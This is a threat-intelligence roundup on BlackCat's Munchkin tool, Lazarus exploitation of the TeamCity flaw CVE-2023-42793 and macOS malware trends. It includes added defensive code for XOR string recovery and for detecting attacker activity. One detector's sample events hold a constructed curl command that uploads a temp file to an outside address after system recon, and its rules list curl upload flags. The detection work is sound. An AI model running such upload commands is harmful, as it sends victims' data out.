In this week’s roundup, CTI reveals the latest activities of BlackCat’s ransomware operators, including their latest tooling updates. Next, CTI investigates two North Korean nation-state threat actors that are part of the Lazarus Group and their recent exploitation of CVE-2023-42793. CTI concludes with a breakdown of how threat actors are using new techniques to compromise Macs, leading Apple to evolve its defenses and enhance its built-in antimalware protection.
1. BlackCat operators introduce Munchkin utility
The operators behind BlackCat ransomware recently announced updates to their tooling, including a utility called Munchkin which allows threat actors to propagate the BlackCat payload to remote machines and shares within networks.
A recently acquired instance of Munchkin is loaded in a customized Alpine Virtual Machine, which enables the threat actor to use virtual machines (VMs) to circumvent security solutions.
About BlackCat ransomware
BlackCat operates as a ransomware-as-a-service (RaaS), which allows affiliates to use its tooling in return for a portion of the profits. BlackCat historically focused on victims within the United States, but the malware family has recently broadened its scope due to its rising popularity, and it has continued to evolve over the years to add capabilities and obfuscation mechanisms.
BlackCat introduces Munchkin utility
The group recently introduced a new tool known as Munchkin, which provides a Linux-based OS featuring Sphynx, the latest BlackCat variant. Operators can use the Munchkin utility to run BlackCat on remote machines or to encrypt remote SMB/CIFS shares.
- BlackCat’s new Munchkin utility is delivered to victims as an ISO file that is loaded in a newly installed instance of the VirtualBox virtualization product.
- The ISO file is a customized implementation of the Alpine OS. The threat actor likely chose this because of its small footprint. When running the OS, several commands are executed that enable the malware to change the root password of the VM.
- It then starts a new terminal session via the built-in tmux utility, which executes the malware binary named controller, and powers the VM off afterwards.
- The controller malware is hosted within the /app directory alongside several other related files, notably /app/controller, /app/config, and /app/payload. Several Python scripts are also present that can be used in subsequent updates within the VM; many of them support lateral movement, password dumping, and further execution of malware.
The controller malware is written in Rust, in a manner that is very similar to the BlackCat malware family.
Once executed, it decrypts several strings via a unique single-byte XOR operation. It then performs basic checks to make sure the expected configuration and payload files are present in the /app directory. If they are, it parses the config file; if not, it exits with an error message.
The /app/config file contains information including access tokens, task identifiers, victim credentials, BlackCat victim URLs, blocklisted file types and paths, and hosts/shares to target for encryption. It will then create and mount the /payloads/ directory that is used to host instances of BlackCat. The controller will use the /app/payload as a template to create customized BlackCat samples. Within the template file there are multiple specific markers that the controller will look for and use to modify the file.
The created files are named with incremental values (for example /payloads/0). Once the payloads are created, the malware iterates through the provided configuration with the intent of infecting any SMB/CIFS drives that were specified. After the malware finishes execution, the VM powers off and performs no additional actions.
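The string-decryption step described above (a single-byte XOR over each embedded string) is one of the first things an analyst has to undo when triaging a sample like the controller binary. The following is an added example written for this roundup, not code from the Munchkin sample, Tanium, or any vendor: it recovers the XOR key either from a known plaintext fragment (a crib such as "/app/") or, failing that, by scoring every candidate key for how much its output looks like path-style text, and then splits the decoded blob into strings. The encoded blob, the key 0x5A, and the NUL-separated layout are all constructed for illustration and are not taken from the real sample.

```python
"""Recover single-byte-XOR-encoded strings from a blob (added example, not sample code)."""
import string
from typing import List, Optional, Tuple

# Byte classes used by the scoring heuristic: letters/digits score best, path
# punctuation scores well, NUL is tolerated as a separator, anything else is penalised.
_WORD = set(bytes(string.ascii_letters + string.digits, "ascii"))
_PUNCT = set(b" /\\._-:@=")
_PRINTABLE = set(bytes(string.printable, "ascii"))


def xor_single_byte(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte; applying it twice restores the input."""
    return bytes(b ^ key for b in data)


def plaintext_score(data: bytes) -> int:
    """Heuristic score: higher means the bytes look more like config/path strings."""
    score = 0
    for b in data:
        if b in _WORD:
            score += 2
        elif b in _PUNCT:
            score += 1
        elif b == 0:
            continue  # NUL separators are expected between strings
        elif b not in _PRINTABLE:
            score -= 5
    return score


def brute_force_key(data: bytes) -> int:
    """Try all 256 keys and return the one whose decoding scores highest."""
    return max(range(256), key=lambda k: plaintext_score(xor_single_byte(data, k)))


def key_from_crib(data: bytes, crib: bytes) -> Optional[int]:
    """Return the key under which a known plaintext fragment appears, or None."""
    for k in range(256):
        if crib in xor_single_byte(data, k):
            return k
    return None


def recover_strings(data: bytes, crib: Optional[bytes] = None) -> Tuple[int, List[str]]:
    """Recover the key (crib first, scoring as fallback) and split the decoded
    blob on NUL bytes into the individual strings."""
    key = key_from_crib(data, crib) if crib else None
    if key is None:
        key = brute_force_key(data)
    decoded = xor_single_byte(data, key)
    strings = [s.decode("ascii", "replace") for s in decoded.split(b"\x00") if s]
    return key, strings


# Constructed sample: three path-like strings, NUL-separated, encoded with key 0x5A.
# These are illustrative values, not bytes from the Munchkin controller.
_SAMPLE_KEY = 0x5A
_SAMPLE_PLAIN = b"/app/config\x00/app/payload\x00/payloads/\x00"
SAMPLE_BLOB = xor_single_byte(_SAMPLE_PLAIN, _SAMPLE_KEY)

if __name__ == "__main__":
    key, strings = recover_strings(SAMPLE_BLOB)
    print(f"key=0x{key:02x} strings={strings}")
    key, strings = recover_strings(SAMPLE_BLOB, crib=b"/app/")
    print(f"crib key=0x{key:02x} strings={strings}")
```

The crib route is the one to prefer when the write-up already tells you which paths the binary checks for, because the scoring heuristic can be fooled by a key that merely flips letter case; the scorer is there for blobs where no plaintext is known in advance.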
Analyst comments from Tanium’s Cyber Threat Intelligence Team
BlackCat has remained one of the most active ransomware operations for quite some time. The operation’s constant addition of new features and tooling, like the latest Munchkin utility, clearly contributes to its continued success.
The latest tactic of leveraging a customized VM to deploy its malware is slowly growing in popularity among threat actors and is something we could see more of in the near future.
2. North Korean Lazarus group actors exploit JetBrains TeamCity flaw
According to Microsoft, two North Korean nation-state threat actors from the Lazarus Group are exploiting CVE-2023-42793. The remote code execution vulnerability impacts multiple versions of the JetBrains TeamCity server — a continuous integration/continuous deployment (CI/CD) application.
The threat actors are likely exploiting this flaw to deploy backdoor malware and carry out software supply chain attacks.
Diamond Sleet and Onyx Sleet
The two threat actors observed by Microsoft are Diamond Sleet and Onyx Sleet (also known as Andariel). Both are part of the infamous nation-state actor known as the Lazarus Group.
- Diamond Sleet typically targets media, IT services, and defense entities globally and has more recently been seen targeting security researchers. The group has also previously carried out software supply chain style attacks.
- Onyx Sleet primarily targets defense and IT services organizations located in South Korea, the U.S., and India. They leverage a wide range of tools for persistence and frequently exploit N-day vulnerabilities for initial access.
Attack path 1: Diamond Sleet
The attack begins with a successful compromise of TeamCity servers via the CVE-2023-42793 vulnerability.
Following the exploitation, Diamond Sleet leveraged PowerShell to download additional payloads from legitimate infrastructure that had been previously compromised. These payloads are stored in the C:\ProgramData directory as Forest64.exe and 4800-84DC-063A6A41C5C; the former checks for the presence of the latter.
The decrypted content of 4800-84DC-063A6A41C5C is the configuration file for the ForestTiger malware. Forest64.exe creates scheduled tasks that run at system start for persistence, and it uses the ForestTiger backdoor to dump credentials via LSASS.
Attack path 2: Diamond Sleet
The same threat actor is also deploying payloads for use in DLL search order hijacking attacks after exploiting the CVE-2023-42793 vulnerability. To do so, they leverage PowerShell to download a malicious DLL from their infrastructure, which is then staged alongside a legitimate executable.
When Version.dll is loaded by the legitimate clip.exe, it loads and decrypts the contents of a readme.md file that is downloaded from the threat actor’s infrastructure. This file contains data for decrypting position-independent code embedded in Version.dll, thus launching the final stage RAT. The second-stage executable decrypts a config file containing URLs that the malware will use for C2. Again, Microsoft observed the threat actor dumping credentials via LSASS.
Attack path 3: Onyx Sleet
The third observed attack path is carried out by Onyx Sleet. It also begins with successful exploitation of the CVE-2023-42793 vulnerability.
In this example, the threat actor creates a new user account named krtbgt on compromised systems, likely intended to impersonate the legitimate KRBTGT Windows account. This account is then added to the Local Administrators group through net use. Onyx Sleet deploys a unique payload that is downloaded from their infrastructure to either C:\Windows\Temp\temp.exe or C:\Windows\ADFS\bg\inetmgr.exe. The payload decrypts an embedded PE resource, which is then loaded into memory and launched. The inner payload is a proxy tool used to establish persistence and has been identified as HazyLoad.
This threat actor has also been observed using the created krtbgt account to sign into the compromised device via RDP — stopping the TeamCity service, dumping credentials via LSASS, and deploying tools to retrieve credentials stored in browsers.
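The three attack paths above leave a consistent trail in Windows Security auditing: a new account whose name imitates a built-in privileged account (4720), that account joining local Administrators (4732), a scheduled task whose action runs from C:\ProgramData or C:\Windows\Temp (4698), and an RDP logon (4624, logon type 10) by the same account. The following is an added detection example written for this roundup, not code from Microsoft or Tanium. It runs over constructed, simplified event records (dicts with the fields a SIEM would parse from those events; real 4732 events carry a member SID rather than a resolved name, which is assumed here to have been resolved already) and returns findings. The account name and file paths come from the write-up; the host names, task names and event records are made up, and events are assumed to arrive in chronological order.

```python
"""Detect lookalike-admin account creation, staging-dir scheduled tasks and RDP use
over parsed Windows Security events (added example; records are constructed)."""
from typing import Dict, List

# Built-in names an attacker-created account is likely to imitate.
PRIVILEGED_NAMES = ("krbtgt", "administrator")
# Staging locations named in the write-up, compared case-insensitively.
STAGING_PREFIXES = ("c:\\programdata\\", "c:\\windows\\temp\\", "c:\\windows\\adfs\\bg\\")
RDP_LOGON_TYPE = "10"


def levenshtein(a: str, b: str) -> int:
    """Edit distance (insert/delete/substitute) between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def is_lookalike(name: str, max_distance: int = 2) -> bool:
    """True when the name is within a couple of edits of a privileged name but is not that name."""
    n = name.lower()
    return any(n != p and levenshtein(n, p) <= max_distance for p in PRIVILEGED_NAMES)


def analyse(events: List[Dict[str, str]]) -> List[str]:
    """Walk the events in order and return human-readable findings."""
    findings: List[str] = []
    suspicious = set()  # lower-cased names of accounts flagged at creation time
    for e in events:
        eid, host = e["EventID"], e["Computer"]
        if eid == "4720" and is_lookalike(e["TargetUserName"]):
            suspicious.add(e["TargetUserName"].lower())
            findings.append(f"{host}: account '{e['TargetUserName']}' created; "
                            "name imitates a privileged built-in account")
        elif (eid == "4732" and e["TargetUserName"].lower() == "administrators"
              and e["MemberName"].lower() in suspicious):
            findings.append(f"{host}: suspicious account '{e['MemberName']}' added to local Administrators")
        elif eid == "4698" and e["Command"].lower().startswith(STAGING_PREFIXES):
            findings.append(f"{host}: scheduled task '{e['TaskName']}' executes "
                            f"{e['Command']} from a staging directory")
        elif (eid == "4624" and e["LogonType"] == RDP_LOGON_TYPE
              and e["TargetUserName"].lower() in suspicious):
            findings.append(f"{host}: RDP logon by suspicious account '{e['TargetUserName']}'")
    return findings


# Constructed sample events (hypothetical hosts and task names; not real telemetry).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "4720", "Computer": "BUILD-01", "TargetUserName": "krtbgt"},
    {"EventID": "4720", "Computer": "BUILD-01", "TargetUserName": "svc_backup"},
    {"EventID": "4732", "Computer": "BUILD-01", "TargetUserName": "Administrators", "MemberName": "krtbgt"},
    {"EventID": "4698", "Computer": "BUILD-01", "TaskName": "UpdateCheck",
     "Command": "C:\\ProgramData\\Forest64.exe"},
    {"EventID": "4698", "Computer": "BUILD-01", "TaskName": "VendorUpdater",
     "Command": "C:\\Program Files\\Vendor\\updater.exe"},
    {"EventID": "4624", "Computer": "BUILD-01", "TargetUserName": "krtbgt", "LogonType": "10"},
    {"EventID": "4624", "Computer": "BUILD-01", "TargetUserName": "svc_backup", "LogonType": "3"},
]

if __name__ == "__main__":
    for finding in analyse(SAMPLE_EVENTS):
        print(finding)
```

The lookalike check deliberately compares against the built-in name rather than matching the literal string krtbgt, so a rename by the actor to any other near-miss of KRBTGT or Administrator still fires; the scheduled-task rule is intentionally broad (anything launched from ProgramData or Temp) and is meant to be tuned against a baseline of known-good tasks.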
Analyst comments from Tanium’s Cyber Threat Intelligence Team
Microsoft has been observing this activity since early October even though a fix for this TeamCity vulnerability was released last month — highlighting the fact that there are still vulnerable instances that have yet to be patched.
The two threat actors observed in this activity are both affiliated with the Lazarus Group but used different toolsets and attack paths after exploiting the CVE-2023-42793 vulnerability to achieve their goals.
The Lazarus Group and all its affiliated clusters are a sophisticated threat and are capable of launching damaging attacks. Their TTPs are changing rapidly with each attack, making it important to be aware of their latest activity and ensure you have proper detection mechanisms in place.
3. Threat actors target macOS with evolving techniques
2023 has brought several new approaches to compromising Macs. As a result, Apple is evolving its defenses and continually adding new rules to its XProtect antimalware tool.
A new report from SentinelOne highlights some of the major macOS malware that was recently discovered, and details how threat actors are adapting and adjusting to successfully compromise macOS devices.
Persistence is no longer a priority for infostealers
This year there has been an increase in macOS malware families that deliberately avoid persistence. This is characteristic of infostealers, as they tend to achieve their goal in one execution.
Given how lucrative stolen data can be for threat actors, they typically have no need to persist on the device. Exfiltrated data often gives threat actors what they need for further access and compromise.
On the rise: Targeted social engineering
Threat actors are now using more sophisticated social engineering techniques, particularly in macOS incidents.
For example, macOS malware like RustBucket entices victims to open a “confidential” document and download a PDF viewer that executes malware behind the scenes. RustBucket requires users to override Apple’s macOS security mechanisms.
Researchers have also observed less sophisticated malware aimed at small businesses. The macOS MetaStealer campaign targeted its victims with social engineering lures like “advertising terms of reference” and “Brief_Presentation-Task_Overview.” The files were disk images containing infostealer malware disguised as PDF documents.
Increased use of public offensive security tools
It’s common for threat actors to use offensive security tools on Windows systems, as is evident with Cobalt Strike. The same trend is now emerging in the macOS malware world too. For example, projects like Geacon wrap Cobalt Strike capabilities in Go-based payloads; many have been seen embedded in fake versions of enterprise apps like SecureLink, beaconing out to C2 servers.
The open-source red teaming tool Mythic and various payloads like Poseidon have also been seen in recent macOS campaigns. These function as an implant and C2 administration suite much like Cobalt Strike. Poseidon has built in obfuscation and encrypted communications, providing threat actors with a powerful toolkit.
SentinelOne notes that Apple’s malware blocking service, XProtect, does not yet contain a signature to detect Poseidon payloads, so additional security controls are required.
Living off the orchard
Living-off-the-land binary (LOLBin) techniques have long been used in attacks on other platforms. On macOS, these techniques are increasingly recognized as well and are sometimes described as living-off-the-orchard (LOOBins).
The most commonly used built-in tools include:
- system_profiler for gathering data about the local installation
- sw_vers for collecting the OS version and build
- curl for downloading payloads and exfiltrating data
One of the most common malware families seen in 2023 and throughout the past few years is Adload, which uses a combination of LOLBins.
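Because the three built-ins above are entirely legitimate on their own, a useful macOS detection looks at the sequence rather than any single execution: host reconnaissance (system_profiler or sw_vers) followed shortly by a curl upload from the same parent process, with a lower-severity flag for curl writing into a temp directory. The following is an added example written for this roundup, not code from SentinelOne or Tanium, and not a description of Adload's exact behaviour. It parses constructed process-event lines in a made-up "host=... ppid=... pid=... user=... cmd=..." format (an EDR or an Endpoint Security client would supply equivalent fields), groups them by parent process and applies the rule; the host names, PIDs, the 120-second window and the 203.0.113.10 address are all constructed.

```python
"""Flag LOOBin chains (recon -> curl upload, curl -> temp dir) in macOS process events.
Added example; the event format and sample lines are constructed."""
import os
import re
import shlex
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

RECON_BINS = {"system_profiler", "sw_vers"}
# curl options that send a request body or upload a file.
UPLOAD_FLAGS = {"-d", "--data", "--data-binary", "--data-raw", "--data-urlencode",
                "-F", "--form", "-T", "--upload-file"}
TEMP_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/")
WINDOW = timedelta(seconds=120)  # max gap between recon and upload under one parent
LINE_RE = re.compile(r"^(\S+) host=(\S+) ppid=(\d+) pid=(\d+) user=(\S+) cmd=(.*)$")


def parse_event(line: str) -> Dict:
    """Parse one constructed event line into a dict with a datetime and argv list."""
    m = LINE_RE.match(line)
    if not m:
        raise ValueError(f"unrecognised event line: {line!r}")
    ts, host, ppid, pid, user, cmd = m.groups()
    argv = shlex.split(cmd)
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "host": host,
            "ppid": int(ppid), "pid": int(pid), "user": user, "argv": argv,
            "bin": os.path.basename(argv[0]) if argv else ""}


def curl_uploads(argv: List[str]) -> bool:
    """True when the curl command line sends data (body flags or an explicit POST)."""
    for i, a in enumerate(argv):
        if a in UPLOAD_FLAGS or (a == "-X" and i + 1 < len(argv) and argv[i + 1].upper() == "POST"):
            return True
    return False


def curl_writes_temp(argv: List[str]) -> bool:
    """True when curl is told to write its output into a temp directory."""
    for i, a in enumerate(argv):
        if a in ("-o", "--output") and i + 1 < len(argv) and argv[i + 1].startswith(TEMP_DIRS):
            return True
    return False


def detect(lines: List[str]) -> List[str]:
    """Group events by (host, parent pid) and emit HIGH/LOW findings."""
    events = sorted((parse_event(ln) for ln in lines), key=lambda e: e["ts"])
    by_parent = defaultdict(list)
    for e in events:
        by_parent[(e["host"], e["ppid"])].append(e)
    findings: List[str] = []
    for (host, ppid), evs in by_parent.items():
        recon_times = []  # timestamps of recon binaries seen so far under this parent
        for e in evs:
            if e["bin"] in RECON_BINS:
                recon_times.append(e["ts"])
            elif e["bin"] == "curl":
                cmd = " ".join(e["argv"])
                if curl_uploads(e["argv"]) and any(e["ts"] - t <= WINDOW for t in recon_times):
                    findings.append(f"HIGH {host}: parent pid {ppid} ran host recon then a curl upload: {cmd}")
                elif curl_writes_temp(e["argv"]):
                    findings.append(f"LOW {host}: parent pid {ppid} used curl to write into a temp directory: {cmd}")
    return findings


# Constructed sample events (hypothetical hosts, PIDs and addresses; not real telemetry).
SAMPLE_LINES = [
    "2023-10-25T14:02:11Z host=mac-01 ppid=512 pid=601 user=alice cmd=/usr/sbin/system_profiler SPHardwareDataType",
    "2023-10-25T14:02:12Z host=mac-01 ppid=512 pid=602 user=alice cmd=/usr/bin/sw_vers -productVersion",
    "2023-10-25T14:02:40Z host=mac-01 ppid=512 pid=603 user=alice "
    "cmd=/usr/bin/curl -s -X POST --data-binary @/tmp/.out http://203.0.113.10/upload",
    "2023-10-25T15:10:00Z host=mac-02 ppid=777 pid=801 user=bob cmd=/usr/bin/sw_vers",
    "2023-10-25T16:30:00Z host=mac-02 ppid=777 pid=802 user=bob cmd=/usr/bin/curl -d x=1 http://example.com/",
    "2023-10-25T17:00:00Z host=mac-03 ppid=900 pid=901 user=carol cmd=/usr/bin/curl -o /tmp/update https://example.net/pkg",
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_LINES):
        print(finding)
```

The mac-02 lines show the window doing its job: sw_vers followed eighty minutes later by a curl with a body is ordinary admin activity and is not flagged, while the mac-01 sequence, where both recon tools and the upload share one parent within seconds, is.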
Abusing open-source software for initial compromise
JokerSpy malware emerged over the summer, containing several components including two Python backdoors, the red-teaming tool SwiftBelt, and a Swift-based Mach-O that attempts to masquerade as Apple’s XProtect service. Researchers believe some of these attacks began via a trojanized QR code generator known as QRLog.
Protecting payloads with multi-stage, modular malware
One of the year’s most complex supply chain attacks compromised downstream businesses by maliciously tampering with 3CX’s call routing software client, 3CXDesktopApp. Various initial and intermediate stages of the malware were discovered for the macOS side of the infection chain, but the true final-stage payload is unknown. The known stages were clearly built for stealth and relied on users launching the trojanized application for persistence. The malware collected limited data about the host’s 3CX account before sending that information to the threat actor and self-deleting.
Similarly, the JumpCloud attack in July 2023 used several stages for stealth and to protect late-stage payloads. Both campaigns have been attributed to DPRK-linked threat actors with an emphasis on supply chain attacks.
Analyst comments from Tanium’s Cyber Threat Intelligence Team
SentinelOne’s analysis sheds light on how threat actors are increasingly targeting macOS. Apple’s security team has seemingly been working to improve its efforts to detect malware targeting its own platform, but progress has been slow.
An example of this can be seen with the Atomic Stealer macOS malware that was first reported back in May. Apple just added rules for Atomic Stealer to XProtect in October. This example highlights the importance of quickly identifying and protecting against emerging threats.
Do you have insight into these stories that you want to share? Head over to Tanium’s discussion forum to start a conversation.
For further reading, catch up on our recent cyber threat intelligence roundups.